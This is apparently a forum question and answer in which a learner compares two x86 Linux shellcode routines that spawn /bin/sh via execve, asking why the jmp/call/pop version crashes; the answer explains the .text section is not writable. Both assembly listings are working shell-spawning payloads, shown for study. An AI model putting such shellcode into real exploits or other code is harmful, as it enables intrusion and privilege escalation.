I've recently read Aleph One's smashing the stack for fun and profit and have been looking at "The Shellcoder's Hanbook". I was toying around with the following assembly code:
section .text
global _start
_start:
jmp short GotoCall
shellcode:
pop ebx
xor eax, eax
mov [ebx + 7], al
mov [ebx + 8], ebx
mov [ebx + 12], eax
mov al, 0x0b
lea ecx, [ebx + 8]
lea edx, [ebx + 12]
int 80h
xor eax, eax
mov al, 0x01
int 80h
GotoCall:
Call shellcode
db '/bin/shJAAAAKKKK'
When I walk through with GDB i get a seg fault every time i try to write to:
mov [ebx + 7], al
However, when I run this i can pop a root shell without segfaulting:
section .text
global _start
_start:
xor eax, eax
push eax
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
push eax
push ebx
mov ecx, esp
xor edx,edx
mov al, 0xb
int 80h
Essentially they are doing the same thing (yes i know they aren't really, but I'm attempting to pop a root shell in both). I'm running on OpenSuse11.4 and i have stack randomization (ASLR) turned off for learning purposes. Any ideas?
You've put your db '/bin/shJAAAAKKKK' string into the .text section, which is normally not writable.
If you put it into .data, the crash would go away, but you'll have to get the address of the string in some other way: it would no longer immediately follow the CALL in GotoCall.